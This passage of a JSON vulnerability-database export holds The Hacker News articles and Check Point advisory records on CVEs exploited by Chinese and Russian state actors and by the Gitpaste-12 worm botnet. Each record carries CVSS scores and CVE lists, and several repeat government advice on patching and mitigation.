"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[![linux botnet malware](https://thehackernews.com/images/-fwDdPBvfngM/X9ibO88XoLI/AAAAAAAABQw/D13X0oYaee0IGytkuvamApgShATiHDPpACLcBGAsYHQ/s728-e1000/linux-botnet-malware.jpg)](<https://thehackernews.com/images/-fwDdPBvfngM/X9ibO88XoLI/AAAAAAAABQw/D13X0oYaee0IGytkuvamApgShATiHDPpACLcBGAsYHQ/s0/linux-botnet-malware.jpg>)\n\nA new wormable botnet that spreads via GitHub and Pastebin to install cryptocurrency miners and backdoors on target systems has returned with expanded capabilities to compromise web applications, IP cameras, and routers.\n\nEarly last month, researchers from Juniper Threat Labs documented a crypto-mining campaign called \"[Gitpaste-12](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>),\" which used GitHub to host malicious code containing as many as 12 known attack modules that are executed via commands downloaded from a Pastebin URL.\n\nThe attacks occurred during a 12-day period starting from October 15, 2020, before both the Pastebin URL and repository were shut down on October 30, 2020.\n\nNow according to Juniper, the [second wave of attacks](<https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm>) began on November 10 using payloads from a different GitHub repository, which, among others, contains a Linux crypto-miner (\"ls\"), a file with a list of passwords for brute-force attempts (\"pass\"), and a local privilege escalation exploit for x86_64 Linux systems.\n\nThe initial infection happens via X10-unix, a binary written in Go programming language, that proceeds to download the next-stage payloads from GitHub.\n\n\"The worm conducts a wide-ranging series of attacks targeting web applications, IP cameras, routers and more, comprising at least 31 known vulnerabilities \u2014 seven of which were also seen in the previous Gitpaste-12 sample \u2014 as well as attempts to compromise open Android Debug Bridge connections and existing malware backdoors,\" Juniper researcher Asher Langton noted in a Monday analysis.\n\n[![](https://thehackernews.com/images/-MnNDyRv-4q0/X9iZyru8E8I/AAAAAAAABQg/G32fg2lWOaYfG9Ddivn-xJsuILwFLh2jACLcBGAsYHQ/s0/cryto-malware.jpg)](<https://thehackernews.com/images/-MnNDyRv-4q0/X9iZyru8E8I/AAAAAAAABQg/G32fg2lWOaYfG9Ddivn-xJsuILwFLh2jACLcBGAsYHQ/s0/cryto-malware.jpg>)\n\nIncluded in the list of 31 vulnerabilities are remote code flaws in F5 BIG-IP Traffic Management User Interface (CVE-2020-5902), Pi-hole Web (CVE-2020-8816), Tenda AC15 AC1900 (CVE-2020-10987), and vBulletin (CVE-2020-17496), and an SQL injection bug in FUEL CMS (CVE-2020-17463), all of which came to light this year.\n\nIt's worth noting that [Ttint](<https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/>), a new variant of the Mirai botnet, was observed in October using two Tenda router zero-day vulnerabilities, including CVE-2020-10987, to spread a Remote Access Trojan (RAT) capable of carrying out denial-of-service attacks, execute malicious commands, and implement a reverse shell for remote access.\n\nAside from installing X10-unix and the Monero crypto mining software on the machine, the malware also opens a backdoor listening on ports 30004 and 30006, uploads the victim's external IP address to a private Pastebin paste, and attempts to connect to Android Debug Bridge connections on port 5555.\n\nOn a successful connection, it proceeds to download an Android APK file (\"weixin.apk\") that eventually installs an ARM CPU version of X10-unix.\n\nIn all, at least 100 distinct hosts have been spotted propagating the infection, per Juniper estimates.\n\nThe complete set of malicious binaries and other relevant Indicators of Compromise (IoCs) associated with the campaign can be accessed [here](<https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-15T11:18:00", "type": "thn", "title": "Wormable Gitpaste-12 Botnet Returns to Target Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10987", "CVE-2020-17463", "CVE-2020-17496", "CVE-2020-5902", "CVE-2020-8816"], "modified": "2020-12-15T11:18:55", "id": "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "href": "https://thehackernews.com/2020/12/wormable-gitpaste-12-botnet-returns-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[![Russian Spy Hackers](https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s728-e1000/hacker.jpg)](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[![Critical Infrastructure](https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[![Security Vulnerabilities](https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s728-e1000/Security-Vulnerabilities.jpg)](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T18:00:21", "description": "A remote code execution vulnerability exists in F5 BIG-IP devices. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-22T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Remote Code Execution (CVE-2021-22986; CVE-2021-22987; CVE-2022-1388)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2022-1388"], "modified": "2022-06-13T00:00:00", "id": "CPAI-2021-0198", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:38:38", "description": "A remote code execution vulnerability exists in F5 BIG-IP. Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, 